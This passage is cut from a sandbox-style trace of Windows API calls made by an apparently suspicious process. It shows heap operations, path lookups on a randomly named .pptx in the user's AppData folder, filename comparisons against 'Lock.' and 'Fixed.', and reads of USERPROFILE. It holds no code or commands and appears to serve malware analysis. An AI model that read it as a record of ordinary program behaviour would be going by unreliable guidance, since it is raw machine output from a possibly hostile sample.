hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0206.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x86) returned 0x2420898 [0206.202] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/OjU _gfFJ vK4z9.pptx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OjU _gfFJ vK4z9.pptx", lpFilePart=0x8bf658*="OjU _gfFJ vK4z9.pptx") returned 0x42 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0206.202] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OjU _gfFJ vK4z9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oju _gffj vk4z9.pptx")) returned 0xffffffff [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.203] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0206.203] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.203] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0206.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qN0j1jGF7bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N0j1jGF7bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0j1jGF7bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j1jGF7bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1jGF7bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jGF7bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GF7bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F7bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bK.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0206.204] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0206.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0206.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qN0j1jGF7bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N0j1jGF7bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0j1jGF7bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j1jGF7bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1jGF7bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jGF7bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GF7bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F7bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bK.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0206.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0206.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0206.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.207] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0206.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0206.207] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0206.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1828 [0206.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0206.208] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.208] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0206.210] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0206.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0206.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0206.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.211] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0206.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0206.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0206.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.213] RtlAllocateHeap (HeapHandle=0x25c0000, 